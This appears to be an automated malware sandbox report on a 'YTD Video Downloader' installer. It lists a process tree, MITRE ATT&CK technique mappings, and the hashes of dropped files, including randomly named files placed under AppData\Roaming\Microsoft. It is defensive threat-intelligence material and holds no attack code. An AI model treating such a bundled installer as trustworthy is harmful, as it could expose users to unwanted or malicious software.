    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
    3⤵
    PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
    3⤵
    PID:5380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5828 /prefetch:8
    3⤵
    PID:5448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5940 /prefetch:8
    3⤵
    PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
    3⤵
    PID:5872
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
    3⤵
    PID:6108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
    3⤵
    PID:6116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
    3⤵
    PID:5464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
    3⤵
    PID:5476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5108

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:408
- C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
  "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1168
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/premium.html?lngid=1033&lt=c&isn=530A9BCFE2724896897C4C275C085331&av=5.9.18&ft=4&kt=ytdd
    3⤵
    PID:4352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa81aa46f8,0x7ffa81aa4708,0x7ffa81aa4718
      4⤵
      PID:968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:460

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini

Filesize
14KB

MD5
5e4f61279b53016801d453b1d7a20cd3

SHA1
f32a34a88f7684264bfe4b1589cb7fd346add1b7

SHA256
546f50186b607153c9f121c751ac592b8905c29397bdd7a9c0bd860e467e6ee9

SHA512
1f9514359eada9224ed52815f02b17712d357e9806171acd1b0c88d6dceadac5692e5a131df4af62b8d15fce01759ffdcc3f075c374a33d43e10df8acc5268c6

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll

Filesize
111KB

MD5
ded3aa6b7920334e6b334eaed3db96c5

SHA1
43ddc57d22dce102a3687e548bd36e32fe20495e

SHA256
feed76629d5f9dbe7401a326994e80b003ca5fe1cf876029e4707a71bf4b5860

SHA512
aeec44f69d430a544594433a8e830af075cad27a7dfe83401ee82e51a949d1140e253ee49f786b944ddf98f513f3754eda6bf0311288eddf7ad1a73d8110de9c

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll

Filesize
2.2MB

MD5
3c07164ceba1068ee3eff672d8e11eb6

SHA1
c96d644ad20a788100609061c052220828784a09

SHA256
170a18f9d841606432b9157f243c43c7a2d53bf1fc028a147bd15f505749e69a

SHA512
af48e1d10f442789df7edaa89b7364f7670134af7f8c624b22073eadaf3516cf10aab196b411835afb839c0256314eb3d75fec37afe3f78f5e5fe123b3ffef4f

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll

Filesize
45KB

MD5
ab0a22194181d6d6ff01123dc9a376ce

SHA1
006355a4240c874443db242ec4d79b8f61e149be

SHA256
4d03b0edd616098fa390a41f8d68f6b77f4c96abf0bbf1578e310c1846017da1

SHA512
1db197bf8e99cd3e729a481a6f24fe1b090a12679a6ab5b6334e26a8442bd80d25379104c475fc9a70111b8c57ca048c4a3f40eb6e667814cce9ab1c86b6253e

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll

Filesize
45KB

MD5
91074f5c7288c67eaed2c2c657e373d3

SHA1
84aecb92336c668bd834a749081eaf1e476c38e4

SHA256
085dc559b88b1687b2918b8ee797734adfbbaa233ba7d8f0e8b5abea8740ca51

SHA512
579a27e5f3565efe46a47034f2880782c5a947b56e65118e8cbc58c886ec805ce39593becce5df4aeb851adc12fc22fd3db450c67b864a618dea05822c58a4a4

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll

Filesize
36KB

MD5
43f19a5d4d42e3cd6514348ba5fbdd96

SHA1
1f708f75fb1024be8b3f6e51ac465664f9414e29

SHA256
634e0e8bcecde4375f1f9510980bc2bf95495acfc8d0a14d15307c49829b4b2a

SHA512
bee50cdaeb50c888bd7df7ed789983a47ce6a50ab8bbba006519640530de8744f164628e741be8cd106cc229de1ca5f63ce23f41e94343869e8ba1aadd840f41

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll

Filesize
35KB

MD5
a3297b187aba1024501007bce77eeec4

SHA1
66b0d789f0fc6e465827bc372047ae1b57fb209c

SHA256
bf000179818fd3db857f7f46dca974698258fc11acf518fd77df4f5a9de05bbd

SHA512
8528aedc44bfb827fa2b5c9fe7c36152daa2e7c4cec32b8eabd8167dca4deadbe3dbd2b4723f00355a1f77cca1ff8c3275cc33c85454ef3e951a72bd1a6a407f

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll

Filesize
34KB

MD5
04a21f5ee0a9c27ca5e5dae050f3d275

SHA1
44835c934ec2a4e37a75023317798837e412e34f

SHA256
ef0fdefcf8af37c1ebaca95e79279907a389915d09e81da38fea9ff17afb1acc

SHA512
6fb0b523288c70f11cd1fae8bed774266956033352df6e9dea3f3881a9b971f0d13eddf9d6d124edccc4dc7ead9441749b091017b3f9ed2b33f887a1f8f660fa

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll

Filesize
36KB

MD5
d4f826e68b616cccc1de1e5ef07738b8

SHA1
e35d6657f4de4826d790c935f94ce41320d09b00

SHA256
1b64f39162f9918597019a89068edb9607caae194fd80b5367df08ed06ed5a78

SHA512
877df9980a3951d9f65983ddfac5df8026229e99618cd05b6c803e754074d760c5f4308cd54a1c7e7ba8f65ef684ea43eaa06ebebd4e1a38441ea9a63b47c956

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll

Filesize
46KB

MD5
46672363f47a25d69a5324045f4e8d63

SHA1
f0d65ad9301f953f7b604087d27ce3e600891250

SHA256
0a2f80092b426f11dbf54b10542d3d7b45d2e40fc575e8e0e73cdcca47b4885d

SHA512
24b52206390b04cb909a1da12b46294f2aa848a42c27a6d765e6666ffbf86f64bac929e9210723d5c537a11d015d2f556e39821d01310a328cf41c988a25146b

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll

Filesize
9.5MB

MD5
4088b4e4ea76db97544c76ef7f2af08c

SHA1
c862b32ed75b8ad1c029edd2c0f492fcb689f8e6

SHA256
2d7aff56a160ac39f7b68b34eb1e25bbeee8fca6034fee8f278abd0fb3dbc0d8

SHA512
66f664a8fc270bc611cc1c247fbe9a2b26baa900b7b38a35ac2d232b6af694914667eb066139e1a889b33e226b845f74f615b48ef84eb626fcf3db137468087c

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll

Filesize
528KB

MD5
416108272cc56d4036d5796fbb1b8f3c

SHA1
66a7bb238eb0d4ba6543a0046df5324a8833cceb

SHA256
7bf969f40afb0ae30da950059a10868e1a20c0d64ed7da11fa5c9c7e0a123bc4

SHA512
682062f8d3b012242b3f679a16f1e4edf62f7918864488f49fcc8ee5b938989ec6828417c0f771ec2835e11688ce024dc84dbc859c70daac2fff87fab28019fa

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll

Filesize
78KB

MD5
350983ab596397b2d2703d658baeea8c

SHA1
63205b4238ba14871bc44c7b14b61c43ea509f19

SHA256
36f5f233c3c01c8ddbe330a760d28c0733fc512ba5097daba5c992742e0a6571

SHA512
b923e096a0f0460055d8f959ea496625e87a939b0c054fb2331508d8905a3c19ef7dd9a0d327144a70a1ded62cfb602c42637fa2be1de69b1a74f61101fb962e

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll

Filesize
36KB

MD5
6d9fa70a05698e9b6aa1c6074def16e8

SHA1
41b2e9aa0ed69a75a279cd3b57e5b4666e9ab991

SHA256
3ef1918ccb05373eb15f5298d083c1c0a8e171ed2ab321a6c2270f26c2185a5b

SHA512
a075bdba7c71664880549b6779d56fc5e354f1ed11eb1f50be68e4e6f81c7fc4b4ead6a7478e58c460f292aac02506d01d5c65a7b42cd4a65ef554b75a20eb01

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll

Filesize
39KB

MD5
3dee8d41db28133b3d00bfdf0fd16eaf

SHA1
55f447676e8d94df25285155f6974583613395ed

SHA256
d6af06ae76f1409b16d2e781217b863a7b32d5ca953795f52d5aa54b0491272c

SHA512
6b222b39601210957082e490073b2d15caa0ccb94121385f4372a02f916a04d4c1824b0f897c875fa1a756d81d511f4ffa649dae7cc900c3746817e1049a67ac

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll

Filesize
64KB

MD5
ccc67f588880568bfd46c4b8140f41aa

SHA1
5d37e43434dc31d55624bfd481c816bd2a285b6d

SHA256
8f42dafb5528c09248478913ba39b6381128c28eace727b488d639f36e614a7d

SHA512
5ac2ae619bb27a4c8cd2fdbed454d930cb5ed8ffa134ab6e9eb84c156650955b7eb1ab4542e5477f7aebad95194dd0dd751dfc508781d9820079d8189ef45092

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds

Filesize
220KB

MD5
d8ced7c2193354757988028fbdbf197e

SHA1
23e7c13471207cc7abd0267f11f9c814bece7011

SHA256
6b384b1e208a2260f54e3d003449c53c03acd8947c8762060fd9e9832dc3bd9c

SHA512
96db2348c6c8f00fb14321b3b816a1a59a60bc54f66002253d6ac43768c94aca5ec3435069e17a23426034bd583c350cdfbcb9daf4b258a8fd485bc96a34f908

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

Filesize
1.9MB

MD5
b1934b07dd28fe1ba94df3861128402b

SHA1
c5d918e696059437dacffa8c3359ee31e97e6e06

SHA256
2670c0406f42be2455f3a20e3ae8b024a41c46b956df9214cb63ca1efa18b17e

SHA512
e863702d96a1a8371403933d9a0e082498d15a39fcf0bedb981913981f8cd9dab64e54202c4a7f2b4c6e4407fd3a7bdb9b0a96340b258476cf59057e80cbbc7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1db09182-0695-49df-b710-fd9ed8d00683.tmp

Filesize
5KB

MD5
4ff3713b5c271188cb0bd964e6771127

SHA1
2df21317d43d12651276a45c729322d3141607ff

SHA256
e0eaa3d37f03bc0c74d03463784c7dd214eb0a4e7fd9c836fc16270f6765a811

SHA512
c58b945c73edb09e96e4d35baaf0f6e4706c84d0a09d24c88213e0c23eac3c9beb62df349a22783bb753a987ef0f024a8c8ce8bb0fb2e9333eed86f307977730

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
696B

MD5
05866cc41042dc1f7079d76c65d5eebd

SHA1
ec6d9954658f7780228b1bd121394b509b81cefd

SHA256
185d85be2370f94d0ab1d414520284b06b09ea1931b1916b11f17b6585690206

SHA512
68506c748c1e4d4cd86b713920886c5e3464dd24f5e21864bbc718eeed1b1b561495926d48924420e412bf5ce2c2b581618d79258c07029a91098dd031245024

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
b4c417ba41920930f0ac786c9250c98f

SHA1
555158d19d814a6a35a3850ae073d8c3697b5dd4

SHA256
256c2bad1d7e89b5d10d1a26b25cccf3d14d565cff1a18408a6b212a9367ac64

SHA512
976c800e8ea9a91df66e62dea85756b8a9f1e2a4cf7ff9e86f23a35fb00e1466e83e74a99ebd6a4c188cfee00dd8a8146f7afa669d31a1cb8a4d1f0047c33412

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2a23f2fd88f12f5fe951e234726b6e49

SHA1
26deee55b355fdde623ec2b731e70676b42c08d2

SHA256
5ef294df07bbee72ac7d369c2d95857a9d6d109bddcba9adbdc7c7bff1c64085

SHA512
60021d107313b51c03fde5f4d8a377e810b1f088e4884e49c4469cbf460f48afe480caa5dae8c04c0948e8c84389c737f4d575922ed92fe1665eed8b3519fd03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
867B

MD5
b3059395e13aebdadb585187ead0978c

SHA1
b4ad0700e0e13af80197731441fd8e1251e434b0

SHA256
a86a3aae633b7ad7eb8b8213d7505dd790d6f14ff125751766892f523882cda7

SHA512
a344ee45b9e0670a9dc636762f274754103ecd956a54ae2febd2a11de805da60597235b208ca3f25c9eb485d47a1ae1cffc10a4ea789792aceb3751d7bb87645

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5906ad.TMP

Filesize
871B

MD5
043aa12dd0d7e049e895c5ed496e47d7

SHA1
aa899bfe8f21b171aa1c2a7d302669e809fda2a1

SHA256
f8c961dcb1781d30795f0c23f2d498f5afe44c42d8ad08e235940dad829fc333

SHA512
43e3e7b3d45796ba28b43bb0d234135f8ac6e39c1e001407e12022441d63ee22646eefd55296a4beb9ee7888f236da18b6b02cd1316f95245fe792ac9c91d403

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9e535181323cacf8f95f829b99a30ef8

SHA1
833ed33d0b35d495f7a16caef7609cff4f72b78c

SHA256
3e99c7a007699b9f520de1e273cecef4a45dd53e6d395293f5acf6a06e5aa1cc

SHA512
f77e0169fdef7d3e2c19a9450551883baabe6063a59e2642edc9a38a573661e3ff6a87a4018a2d7264aa4b79fb2d902b4aa06fb5ce0990045f8057f8a0b396bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4hm3cih.xnb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2MGFO.tmp\YTDSetup.exe

Filesize
9.9MB

MD5
37c8ee1cae9779ec094be29a35a5061d

SHA1
ae99157bda438ad024e38dd91a975246b00dd557

SHA256
0ac4b34f2a8f9c004f6c942ce112a0ab87bb1c2b17a7dd745519eb414ebdae35

SHA512
e725a2ec6f3550e8de89b200f4bb79f808f14d6da04d4a80629ecb1b428ba0c74a0468e7b7bb53d89744bbba19066f4799e3a84951d21215ce0b72edf0798728

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2MGFO.tmp\_isetup\_isdecmp.dll

Filesize
34KB

MD5
c6ae924ad02500284f7e4efa11fa7cfc

SHA1
2a7770b473b0a7dc9a331d017297ff5af400fed8

SHA256
31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

SHA512
f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-E946B.tmp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp

Filesize
3.2MB

MD5
f95ada73befa755b571eb48a45a9d3d2

SHA1
b9e468de9711bec40c2c7ad846fda0d28aadb78e

SHA256
b90ac9da590ba7de19414b7ba6fbece13ba0c507f1d6be2be2b647091f5779f0

SHA512
327c4b535e8b19bc1c4340e768ea025357f1e200c43ced9ebc92903cc6ae305c31fb57e0fb81ebad9e80a96fb2f6cadc97a7b8c6ff5c34bf5e07e58014b03399

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsnA809.tmp\NSISHelper.dll

Filesize
401KB

MD5
373c6ac98ae82cf341394215d28b5830

SHA1
2e3542372f1e520cdd47d30035dda85fdd2b11f9

SHA256
5cfd1ab1740c4a68cae314157468423dcd7b0ffe873b91257e10fa28169a7d18

SHA512
6d0a31a6c5c4b965633f943eaa15d3495be072f035d97deac27690d6a6a6890a8f817b406153fbba5a8862675b4f3015ac9e93fc8b6d90b1c4b029857123a117

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsnA809.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsnA809.tmp\UserInfo.dll

Filesize
4KB

MD5
9eb662f3b5fbda28bffe020e0ab40519

SHA1
0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41

SHA256
9aa388c7de8e96885adcb4325af871b470ac50edb60d4b0d876ad43f5332ffd1

SHA512
6c36f7b45efe792c21d8a87d03e63a4b641169fad6d014db1e7d15badd0e283144d746d888232d6123b551612173b2bb42bf05f16e3129b625f5ddba4134b5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsnA809.tmp\nsDialogs.dll

Filesize
9KB

MD5
466179e1c8ee8a1ff5e4427dbb6c4a01

SHA1
eb607467009074278e4bd50c7eab400e95ae48f7

SHA256
1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172

SHA512
7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsnA809.tmp\nsisdl.dll

Filesize
15KB

MD5
ba2cc9634ebed71cea697a31144af802

SHA1
8221c522b24f4808f66a476381db3e6455eab5c3

SHA256
9a3c2fe5490c34f73f1a05899ef60cfef05e0c9599cd704e524ef7a46ead67ba

SHA512
dcc74bcedd9402f7ac7e2d1872fe0e2876ae93cf8bbd869d5b9b7b56cea244ba8d2891fa2b51382092b86480337936f5ec495d9005d47fbfd9e2b71cb7f6ba8f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\ACbmHYktWnVQXhaKG.kBYTWzSaODeIGtxci

Filesize
155KB

MD5
6cacbf2f1e20a04588446abb95a755bb

SHA1
39f112d93ebaccc6c98df0835a7f2c905d060dc1

SHA256
92e3a7da83b2aa738f4f2041fa7971fdab0f2d11d6b2cb2529d4aeabce821257

SHA512
7f4a028a1eb7a12a6f3cb10b2126e3000c01a3fb713625e51bf427abe2507812b215255bee716326e946311843f4d827a5cde069aa35caf1a598401d259c95d8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\AOQkNZgGKbS.jnEatSYIJNPGvB

Filesize
128KB

MD5
4a360536650ba93f6a597fc2f9e34d68

SHA1
b44ba97e15b30a4211a6095f80ebca7c909123d9

SHA256
7236e91248c2a84cb84750f021197d23baffae915a1d7816c1671793df0f2b4b

SHA512
8e22419dbdf12a71c29bb56692244e3f4d7ef74595193e148a8086e2f65a0830dedcbc62f1d52df8be19e81d2c68ce07c202e9ecff7d48b90e88c4664e28dd3c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\AvVhLtuaHnFJC.epXqvuxfZLjDthGJmWB

Filesize
102KB

MD5
4914662cbc49fd73170652d40bc2440f

SHA1
c59b18a3191fc2f7feb47233b48e3c844b3c3391

SHA256
a6ce81024be2d86fef9b7ab7ff362f9c15bee3142e30ebc945cc4792c174ee80

SHA512
c1ec4995b21736d05b969e260276aeb445f6ceb116f25c81521d6d28406af1f70c88c10860dfe49d5bae56466a1afb85ba1b5704fe80519c7d1d6de293e5f9cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\DCWpLXZsoOIKNnBGk.vEFUNQmWbfAp

Filesize
57KB

MD5
d65ac2b010b37e4acddcba661f31b84a

SHA1
5bae9dc8960a6ca430caf286e594c681b37ee7a3

SHA256
04389654dad2599243b1da88a4830bf37b3e822c85b27ee401b1c8e785315252

SHA512
b202f0d5e8999191f39cfaaf0a6588d85a3ecb67f8fac96dfaaffa1049bbc393a95af30c183a6dda0734f5020bdf16b4647f5078f01067517a6d344237fcecd9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\FgwZaHNRTAMvLOIt.UYkrbgtMKj

Filesize
115KB

MD5
5e16f916da97fa86c3a9c854c5d1edba

SHA1
b27c57ad02b8bdab11a83ebbd39d30b9cce5d1af

SHA256
